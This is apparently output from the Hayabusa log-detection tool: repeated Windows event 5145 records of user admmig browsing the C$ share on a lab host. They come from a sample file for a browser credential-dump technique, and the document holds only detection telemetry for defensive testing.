2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.723 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.723 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.739 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.739 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.785 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.785 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
